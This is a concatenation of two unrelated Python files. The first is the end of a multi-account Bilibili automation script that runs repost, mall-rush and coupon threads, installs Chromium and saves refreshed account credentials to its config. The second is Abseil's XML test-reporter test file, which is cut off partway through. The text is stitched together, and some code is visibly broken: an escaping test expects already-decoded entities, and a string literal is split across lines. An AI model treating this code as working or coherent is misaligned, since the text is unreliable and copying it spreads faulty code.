threads.append(threading.Thread(target=delay_wrapper, args=(instance.dynamic_repost, 5, list(zip(config['dynamic_repost']['did'], config['dynamic_repost']['message'], config['dynamic_repost']['ats'])))))
if config['dynamic_purge']['enable']:
threads.append(threading.Thread(target=instance.dynamic_purge))
if config['system_notice']['enable']:
threads.append(threading.Thread(target=instance.system_notice, args=(config['system_notice']['time_span'], config['system_notice']['keyword'])))
if config['mall_rush']['enable']:
for item in zip(config['mall_rush']['item_id'], config['mall_rush']['thread']):
threads.append(threading.Thread(target=instance.mall_rush, args=(item[0], item[1], config['mall_rush']['headless'], config['mall_rush']['timeout'])))
if config['mall_coupon']['enable']:
for coupon in zip(config['mall_coupon']['coupon_id'], config['mall_coupon']['thread']):
threads.append(threading.Thread(target=instance.mall_coupon, args=(coupon[0], coupon[1])))
if config['mall_order_list']['enable']:
threads.append(threading.Thread(target=instance.mall_order_list, args=(config['mall_order_list']['status'], config['mall_order_list']['type'])))
if config['mall_coupon_list']['enable']:
threads.append(threading.Thread(target=instance.mall_coupon_list, args=(config['mall_coupon_list']['status'],)))
if config['mall_prize_list']['enable']:
threads.append(threading.Thread(target=instance.mall_prize_list, args=(config['mall_prize_list']['status'], config['mall_prize_list']['type'])))
if config['live_prize_list']['enable']:
threads.append(threading.Thread(target=instance.live_prize_list))
# instance._log("任务开始执行")
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# instance._log("任务执行完毕")
return {
'username': instance.username,
'password': instance.password,
'access_token': instance.access_token,
'refresh_token': instance.refresh_token,
'cookie': instance.get_cookies(),
}
def main():
print(f"{banner}\n{__doc__}\n版本: {__version__}\n")
config_file = sys.argv[1] if len(sys.argv) > 1 else "config.toml"
try:
with open(config_file, "r", encoding=detect_charset(config_file)) as f:
config = toml.load(f)
except:
print(f"无法加载{config_file}")
return
accounts = []
for line in config['user']['account'].splitlines():
try:
if line[0] == "#":
continue
pairs = {}
for pair in line.strip(";").split(";"):
if len(pair.split("=")) == 2:
key, value = pair.split("=")
pairs[key] = value
password = all(key in pairs for key in ["username", "password"])
token = all(key in pairs for key in ["access_token", "refresh_token"])
cookie = all(key in pairs for key in ["bili_jct", "DedeUserID", "DedeUserID__ckMd5", "sid", "SESSDATA"])
if password or token or cookie:
accounts.append(pairs)
except:
pass
config['user'].pop("account")
print(f"导入了{len(accounts)}个用户")
if not accounts:
return
if config['mall_rush']['enable']:
if platform.system() == "Linux" and os.path.exists("/etc/debian_version"):
prefix = "sudo " if shutil.which("sudo") else ""
if shutil.which("chromium-browser") is None:
os.system(f"{prefix}apt -y install chromium-browser")
if shutil.which("chromedriver") is None:
os.system(f"{prefix}apt -y install chromium-chromedriver")
os.system(f"{prefix}ln -s /usr/lib/chromium-browser/chromedriver /usr/bin")
elif platform.system() == "Linux" and os.path.exists("/etc/redhat-release"):
prefix = "sudo " if shutil.which("sudo") else ""
if shutil.which("chromium-browser") is None:
os.system(f"{prefix}yum -y install chromium")
if shutil.which("chromedriver") is None:
os.system(f"{prefix}yum -y install chromedriver")
elif platform.system() == "Windows":
if not os.path.exists("chrome-win\\chrome.exe"):
decompress(download("https://npm.taobao.org/mirrors/chromium-browser-snapshots/Win/706915/chrome-win.zip"))
if not os.path.exists("chromedriver.exe"):
decompress(download("https://npm.taobao.org/mirrors/chromedriver/79.0.3945.36/chromedriver_win32.zip"))
else:
print("会员购抢购组件不支持在当前平台上运行")
config['mall_rush']['enable'] = False
queue = Manager().Queue()
export_process = Process(target=export, args=(queue, config))
export_process.start()
with Pool(min(config['global']['process'], len(accounts))) as p:
result = p.map(wrapper, [{
'config': config,
'account': account,
'queue': queue,
} for account in accounts])
p.close()
p.join()
if config['user']['update']:
with open(config_file, "r+", encoding=detect_charset(config_file)) as f:
content = f.read()
before = content.split("account")[0]
after = content.split("account")[-1].split("\"\"\"")[-1]
f.seek(0)
f.truncate()
f.write(before)
f.write("account = \"\"\"\n")
for credential in result:
new_line = False
for key, value in credential.items():
if value:
if key == "cookie":
f.write(f"{';'.join(f'{key}={value}' for key, value in value.items())};")
else:
f.write(f"{key}={value};")
new_line = True
if new_line:
f.write("\n")
f.write("\"\"\"")
f.write(after)
print("凭据已更新")
queue.put(None)
export_process.join()
if __name__ == "__main__":
freeze_support()
main()
if platform.system() == "Windows":
os.system("pause >nul | set /p =请按任意键退出")
|
xml_reporter_test.py
|
# Copyright 2017 The Abseil Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
import re
import subprocess
import sys
import tempfile
import threading
import time
import unittest
from xml.etree import ElementTree
from xml.parsers import expat
from absl import logging
from absl.testing import _bazelize_command
from absl.testing import absltest
from absl.testing import parameterized
from absl.testing import xml_reporter
from absl.third_party import unittest3_backport
import mock
import six
class StringIOWriteLn(six.StringIO):
def writeln(self, line):
self.write(line + '\n')
class MockTest(absltest.TestCase):
failureException = AssertionError
def __init__(self, name):
super(MockTest, self).__init__()
self.name = name
def id(self):
return self.name
def runTest(self):
return
def shortDescription(self):
return "This is this test's description."
# str(exception_type) is different between Python 2 and 3.
def xml_escaped_exception_type(exception_type):
return xml_reporter._escape_xml_attr(str(exception_type))
OUTPUT_STRING = '\n'.join([
r'<\?xml version="1.0"\?>',
'<testsuites name="" tests="%(tests)d" failures="%(failures)d"'
' errors="%(errors)d" time="%(run_time).1f" timestamp="%(start_time)s">',
'<testsuite name="%(suite_name)s" tests="%(tests)d"'
' failures="%(failures)d" errors="%(errors)d" time="%(run_time).1f" timestamp="%(start_time)s">',
' <testcase name="%(test_name)s" status="%(status)s" result="%(result)s"'
' time="%(run_time).1f" classname="%(classname)s"'
' timestamp="%(start_time)s">%(message)s', ' </testcase>', '</testsuite>',
'</testsuites>'
])
FAILURE_MESSAGE = r"""
<failure message="e" type="{}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_sample_failure
raise AssertionError\(\'e\'\)
AssertionError: e
\]\]></failure>""".format(xml_escaped_exception_type(AssertionError))
ERROR_MESSAGE = r"""
<error message="invalid literal for int\(\) with base 10: (')?a(')?" type="{}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_sample_error
int\('a'\)
ValueError: invalid literal for int\(\) with base 10: '?a'?
\]\]></error>""".format(xml_escaped_exception_type(ValueError))
UNICODE_MESSAGE = r"""
<%s message="{0}" type="{1}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_unicode_sample_failure
raise AssertionError\(u'\\xe9'\)
AssertionError: {0}
\]\]></%s>""".format(
r'\\xe9' if six.PY2 else r'\xe9',
xml_escaped_exception_type(AssertionError))
NEWLINE_MESSAGE = r"""
<%s message="{0}" type="{1}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_newline_message_sample_failure
raise AssertionError\(\'{2}'\)
AssertionError: {3}
\]\]></%s>""".format(
'new
line',
xml_escaped_exception_type(AssertionError),
r'new\\nline',
'new\nline')
UNEXPECTED_SUCCESS_MESSAGE = '\n'.join([
'',
r' <error message="" type=""><!\[CDATA\[Test case '
r'__main__.MockTest.unexpectedly_passing_test should have failed, '
r'but passed.\]\]></error>'])
UNICODE_ERROR_MESSAGE = UNICODE_MESSAGE % ('error', 'error')
NEWLINE_ERROR_MESSAGE = NEWLINE_MESSAGE % ('error', 'error')
class TextAndXMLTestResultTest(absltest.TestCase):
def setUp(self):
self.stream = StringIOWriteLn()
self.xml_stream = six.StringIO()
def _make_result(self, times):
timer = mock.Mock()
timer.side_effect = times
return xml_reporter._TextAndXMLTestResult(self.xml_stream, self.stream,
'foo', 0, timer)
def _assert_match(self, regex, output):
fail_msg = 'Expected regex:\n{}\nTo match:\n{}'.format(regex, output)
self.assertRegex(output, regex, fail_msg)
def _assert_valid_xml(self, xml_output):
try:
expat.ParserCreate().Parse(xml_output)
except expat.ExpatError as e:
raise AssertionError('Bad XML output: {}\n{}'.format(e, xml_output))
def _simulate_error_test(self, test, result):
result.startTest(test)
result.addError(test, self.get_sample_error())
result.stopTest(test)
def _simulate_failing_test(self, test, result):
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
def _simulate_passing_test(self, test, result):
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
def _iso_timestamp(self, timestamp):
return datetime.datetime.utcfromtimestamp(timestamp).isoformat() + '+00:00'
def test_with_passing_test(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
result.startTestRun()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'passing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_passing_subtest(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTestRun()
result.startTest(test)
result.addSubTest(test, subtest, None)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': r'passing_test \[msg\]',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_passing_subtest_with_dots_in_parameter_name(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', {'case': 'a.b.c'})
else:
# In Python 3 subTest uses a ChainMap to hold the parameters, but ChainMap
# does not exist in Python 2, so a list of dict is used to simulate the
# behavior of a ChainMap. This is why a list is provided as a parameter
# here.
subtest = unittest3_backport.case._SubTest(test, 'msg',
[{'case': 'a.b.c'}])
result.startTestRun()
result.startTest(test)
result.addSubTest(test, subtest, None)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
0,
'run_time':
run_time,
'start_time':
re.escape(self._iso_timestamp(start_time),),
'test_name':
r'passing_test \[msg\] \(case='a.b.c'\)',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def get_sample_error(self):
try:
int('a')
except ValueError:
error_values = sys.exc_info()
return error_values
def get_sample_failure(self):
try:
raise AssertionError('e')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_newline_message_sample_failure(self):
try:
raise AssertionError('new\nline')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_unicode_sample_failure(self):
try:
raise AssertionError(u'\xe9')
except AssertionError:
error_values = sys.exc_info()
return error_values
def get_terminal_escape_sample_failure(self):
try:
raise AssertionError('\x1b')
except AssertionError:
error_values = sys.exc_info()
return error_values
def test_with_failing_test(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 1,
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': FAILURE_MESSAGE
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_failing_subtest(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTestRun()
result.startTest(test)
result.addSubTest(test, subtest, self.get_sample_failure())
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 1,
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': r'failing_test \[msg\]',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': FAILURE_MESSAGE
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_sample_error())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ERROR_MESSAGE
}
self._assert_match(expected_re, xml)
def test_with_error_subtest(self):
start_time = 10
end_time = 20
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.error_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTestRun()
result.startTest(test)
result.addSubTest(test, subtest, self.get_sample_error())
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': r'error_test \[msg\]',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ERROR_MESSAGE
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_fail_and_error_test(self):
"""Tests a failure and subsequent error within a single result."""
start_time = 123
end_time = 456
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
# This could happen in tearDown
result.addError(test, self.get_sample_error())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 1, # Only the failure is tallied (because it was first).
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
# Messages from failure and error should be concatenated in order.
'message': FAILURE_MESSAGE + ERROR_MESSAGE
}
self._assert_match(expected_re, xml)
def test_with_error_and_fail_test(self):
"""Tests an error and subsequent failure within a single result."""
start_time = 123
end_time = 456
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_sample_error())
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1, # Only the error is tallied (because it was first).
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
# Messages from error and failure should be concatenated in order.
'message': ERROR_MESSAGE + FAILURE_MESSAGE
}
self._assert_match(expected_re, xml)
def test_with_newline_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_newline_message_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': NEWLINE_ERROR_MESSAGE
} + '\n'
self._assert_match(expected_re, xml)
def test_with_unicode_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_unicode_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
xml = self.xml_stream.getvalue()
self._assert_valid_xml(xml)
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': UNICODE_ERROR_MESSAGE
}
self._assert_match(expected_re, xml)
def test_with_terminal_escape_error(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
result.addError(test, self.get_terminal_escape_sample_failure())
result.stopTest(test)
result.stopTestRun()
result.printErrors()
self._assert_valid_xml(self.xml_stream.getvalue())
def test_with_expected_failure_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
error_values = ''
try:
raise RuntimeError('Test expectedFailure')
except RuntimeError:
error_values = sys.exc_info()
test = MockTest('__main__.MockTest.expected_failing_test')
result.startTestRun()
result.startTest(test)
result.addExpectedFailure(test, error_values)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'expected_failing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''
}
self._assert_match(re.compile(expected_re, re.DOTALL),
self.xml_stream.getvalue())
def test_with_unexpected_success_error_test(self):
start_time = 100
end_time = 200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.unexpectedly_passing_test')
result.startTestRun()
result.startTest(test)
result.addUnexpectedSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 1,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'unexpectedly_passing_test',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': UNEXPECTED_SUCCESS_MESSAGE
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_skipped_test(self):
start_time = 100
end_time = 100
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.skipped_test_with_reason')
result.startTestRun()
result.startTest(test)
result.addSkip(test, 'b"r')
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'skipped_test_with_reason',
'classname': '__main__.MockTest',
'status': 'notrun',
'result': 'suppressed',
'message': ''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_suite_time(self):
start_time1 = 100
end_time1 = 200
start_time2 = 400
end_time2 = 700
name = '__main__.MockTest.failing_test'
result = self._make_result((start_time1, start_time1, end_time1,
start_time2, end_time2, end_time2))
test = MockTest('%s1' % name)
result.startTestRun()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
test = MockTest('%s2' % name)
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = max(end_time1, end_time2) - min(start_time1, start_time2)
timestamp = self._iso_timestamp(start_time1)
expected_prefix = """<?xml version="1.0"?>
<testsuites name="" tests="2" failures="0" errors="0" time="%.1f" timestamp="%s">
<testsuite name="MockTest" tests="2" failures="0" errors="0" time="%.1f" timestamp="%s">
""" % (run_time, timestamp, run_time, timestamp)
xml_output = self.xml_stream.getvalue()
self.assertTrue(
xml_output.startswith(expected_prefix),
'%s not found in %s' % (expected_prefix, xml_output))
def test_with_no_suite_name(self):
start_time = 1000
end_time = 1200
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.bad_name')
result.startTestRun()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name': 'MockTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': 'bad_name',
'classname': '__main__.MockTest',
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_unnamed_parameterized_testcase(self):
"""Test unnamed parameterized test cases.
Unnamed parameterized test cases might have non-alphanumeric characters in
their test method names. This test ensures xml_reporter handles them
correctly.
"""
class ParameterizedTest(parameterized.TestCase):
@parameterized.parameters(('a (b.c)',))
def test_prefix(self, case):
self.assertTrue(case.startswith('a'))
start_time = 1000
end_time = 1200
result = self._make_result((start_time, start_time, end_time, end_time))
test = ParameterizedTest(methodName='test_prefix0')
result.startTestRun()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
classname = xml_reporter._escape_xml_attr(
unittest.util.strclass(test.__class__))
expected_re = OUTPUT_STRING % {
'suite_name': 'ParameterizedTest',
'tests': 1,
'failures': 0,
'errors': 0,
'run_time': run_time,
'start_time': re.escape(self._iso_timestamp(start_time),),
'test_name': re.escape('test_prefix0 ('a (b.c)')'),
'classname': classname,
'status': 'run',
'result': 'completed',
'attributes': '',
'message': ''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def teststop_test_without_pending_test(self):
end_time = 1200
result = self._make_result((end_time,))
test = MockTest('__main__.MockTest.bad_name')
result.stopTest(test)
result.stopTestRun()
# Just verify that this doesn't crash
def test_text_and_xmltest_runner(self):
runner = xml_reporter.TextAndXMLTestRunner(self.xml_stream, self.stream,
'foo', 1)
result1 = runner._makeResult()
result2 = xml_reporter._TextAndXMLTestResult(None, None, None, 0, None)
self.failUnless(type(result1) is type(result2))
def test_timing_with_time_stub(self):
"""Make sure that timing is correct even if time.time is stubbed out."""
try:
saved_time = time.time
time.time = lambda: -1
reporter = xml_reporter._TextAndXMLTestResult(self.xml_stream,
self.stream,
'foo', 0)
test = MockTest('bar')
reporter.startTest(test)
self.failIf(reporter.start_time == -1)
finally:
time.time = saved_time
def test_concurrent_add_and_delete_pending_test_case_result(self):
"""Make sure adding/deleting pending test case results are thread safe."""
result = xml_reporter._TextAndXMLTestResult(None, self.stream, None, 0,
None)
def add_and_delete_pending_test_case_result(test_name):
test = MockTest(test_name)
result.addSuccess(test)
result.delete_pending_test_case_result(test)
for i in range(50):
add_and_delete_pending_test_case_result('add_and_delete_test%s' % i)
self.assertEqual(result.pending_test_case_results, {})
def test_concurrent_test_runs(self):
"""Make sure concurrent test runs do not race each other."""
num_passing_tests = 20
num_failing_tests = 20
num_error_tests = 20
total_num_tests = num_passing_tests + num_failing_tests + num_error_tests
times = [0] + [i for i in range(2 * total_num_tests)
] + [2 * total_num_tests - 1]
result = self._make_result(times)
threads = []
names = []
result.startTestRun()
for i in range(num_passing_tests):
name = 'passing_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
# xml_reporter uses id(test) as the test identifier.
# In a real testing scenario, all the test instances are created before
# running them. So all ids will be unique.
# We must do the same here: create test instance beforehand.
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_passing_test, args=(test, result)))
for i in range(num_failing_tests):
name = 'failing_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_failing_test, args=(test, result)))
for i in range(num_error_tests):
name = 'error_concurrent_test_%s' % i
names.append(name)
test_name = '__main__.MockTest.%s' % name
test = MockTest(test_name)
threads.append(threading.Thread(
target=self._simulate_error_test, args=(test, result)))
for t in threads:
t.start()
for t in threads:
t.join()
result.stopTestRun()
result.printErrors()
tests_not_in_xml = []
for tn in names:
if tn not in self.xml_stream.getvalue():
tests_not_in_xml.append(tn)
msg = ('Expected xml_stream to contain all test %s results, but %s tests '
'are missing. List of missing tests: %s' % (
total_num_tests, len(tests_not_in_xml), tests_not_in_xml))
self.assertEqual([], tests_not_in_xml, msg)
def test_add_failure_during_stop_test(self):
"""Tests an addFailure() call from within a stopTest() call stack."""
result = self._make_result((0, 2))
test = MockTest('__main__.MockTest.failing_test')
result.startTestRun()
result.startTest(test)
# Replace parent stopTest method from unittest3_backport.TextTestResult with
# a version that calls self.addFailure().
with mock.patch.object(
unittest3_backport.TextTestResult,
'stopTest',
side_effect=lambda t: result.addFailure(t, self.get_sample_failure())):
# Run stopTest in a separate thread since we are looking to verify that
# it does not deadlock, and would otherwise prevent the test from
# completing.
stop_test_thread = threading.Thread(target=result.stopTest, args=(test,))
stop_test_thread.daemon = True
stop_test_thread.start()
stop_test_thread.join(10.0)
self.assertFalse(stop_test_thread.is_alive(),
'result.stopTest(test) call failed to complete')
class XMLTest(absltest.TestCase):
def test_escape_xml(self):
self.assertEqual(xml_reporter._escape_xml_attr('"Hi" <\'>\t\r\n'),
'"Hi" <'>	
')
class XmlReporterFixtureTest(absltest.TestCase):
def _get_helper(self):
binary_name = 'absl/testing/tests/xml_reporter_helper_test'
return _bazelize_command.get_executable_path(binary_name)
def _run_test_and_get_xml(self, flag):
"""Runs xml_reporter_helper_test and returns an Element instance.
Runs xml_reporter_helper_test in a new process so that it can
exercise the entire test infrastructure, and easily test issues in
the test fixture.
Args:
flag: flag to pass to xml_reporter_helper_test
Returns:
The Element instance of the XML output.
"""
xml_fhandle, xml_fname = tempfile.mkstemp()
os.close(xml_fhandle)
try:
binary = self._get_helper()
args = [binary, flag, '--xml_output_file=%s' % xml_fname]
ret = subprocess.call(args)
self.assertEqual(ret, 0)
xml = ElementTree.parse(xml_fname).getroot()
finally:
os.remove(xml_fname)
return xml
def _run_test(self, flag, num_errors, num_failures, suites):
xml_fhandle, xml_fname = tempfile.mkstemp()
os.close(xml_fhandle)
try:
binary = self._get_helper()
args = [binary, flag, '--xml_output_file=%s' % xml_fname]
ret = subprocess.call(args)
self.assertNotEqual(ret, 0)
xml = ElementTree.parse(xml_fname).getroot()
logging.info('xml output is:\n%s', ElementTree.tostring(xml))
finally:
os.remove(xml_fname)
self.assertEqual(int(xml.attrib['errors']), num_errors)
self.assertEqual(int(xml.attrib['failures']), num_failures)
self.assertLen(xml, len(suites))
actual_suites = sorted(
xml.findall('testsuite'), key=lambda x: x.attrib['name'])
suites = sorted(suites, key=lambda x: x['name'])
for actual_suite, expected_suite in zip(actual_suites, suites):
self.assertEqual(actual_suite.attrib['name'], expected_suite['name'])
self.assertLen(actual_suite, len(expected_suite['cases']))
actual_cases = sorted(actual_suite.findall('testcase'),
key=lambda x: x.attrib['name'])
expected_cases = sorted(expected_suite['cases'], key=lambda x: x['name'])
for actual_case, expected_case in zip(actual_cases, expected_cases):
self.assertEqual(actual_case.attrib['name'], expected_case['name'])
self.assertEqual(actual_case.attrib['classname'],
expected_case['classname'])
if 'error' in expected_case:
actual_error = actual_case.find('error')
self.assertEqual(actual_error.attrib['message'],
expected_case['error'])
if 'failure' in expected_case:
actual_failure = actual_case.find('failure')
self.assertEqual(actual_failure.attrib['message'],
expected_case['failure'])
return xml
def test_set_up_module_error(self):
self._run_test(
flag='--set_up_module_error',
num_errors=1,
num_failures=0,
suites=[{'name': '__main__',
'cases': [{'name': 'setUpModule',
'classname': '__main__',
'error': 'setUpModule Errored!'}]}])
def test_tear_down_module_error(self):
self._run_test(
flag='--tear_down_module_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'test',
'classname': '__main__.FailableTest'}]},
{'name': '__main__',
'cases': [{'name': 'tearDownModule',
'classname': '__main__',
'error': 'tearDownModule Errored!'}]}])
def test_set_up_class_error(self):
self._run_test(
flag='--set_up_class_error',
num_errors=1,
num_failures=0,
suites=[{'name': 'FailableTest',
'cases': [{'name': 'setUpClass',
'classname': '__main__.FailableTest',
